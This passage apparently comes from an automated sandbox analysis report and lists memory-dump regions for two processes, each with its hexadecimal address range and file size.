                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2268-93-0x000001BAA4B80000-0x000001BAA4C82000-memory.dmp

                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • memory/2268-91-0x000001BA8C620000-0x000001BA8C630000-memory.dmp

                                                                                          Filesize

                                                                                          64KB

                                                                                        • memory/2268-81-0x000001BAA47E0000-0x000001BAA486A000-memory.dmp

                                                                                          Filesize

                                                                                          552KB

                                                                                        • memory/2268-92-0x000001BAA4780000-0x000001BAA47A2000-memory.dmp

                                                                                          Filesize

                                                                                          136KB

                                                                                        • memory/2440-48-0x00007FF802480000-0x00007FF80248F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/2440-321-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-80-0x00007FFFEA8C0000-0x00007FFFEA9DB000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2440-195-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2440-78-0x00007FF800550000-0x00007FF80055D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-73-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-72-0x0000016835250000-0x0000016835779000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-71-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-67-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2440-68-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2440-64-0x00007FF8009A0000-0x00007FF8009AD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-62-0x00007FFFFA870000-0x00007FFFFA889000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-60-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2440-58-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2440-56-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-54-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2440-76-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-30-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-25-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-299-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-320-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2440-77-0x00007FFFFA850000-0x00007FFFFA864000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/2440-336-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2440-331-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2440-330-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2440-322-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-332-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-337-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-352-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-365-0x00007FFFEA8C0000-0x00007FFFEA9DB000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2440-364-0x00007FF800550000-0x00007FF80055D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-363-0x00007FFFFA850000-0x00007FFFFA864000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/2440-362-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-361-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2440-360-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2440-359-0x00007FF8009A0000-0x00007FF8009AD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-358-0x00007FFFFA870000-0x00007FFFFA889000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-357-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2440-356-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2440-355-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-354-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2440-353-0x00007FF802480000-0x00007FF80248F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB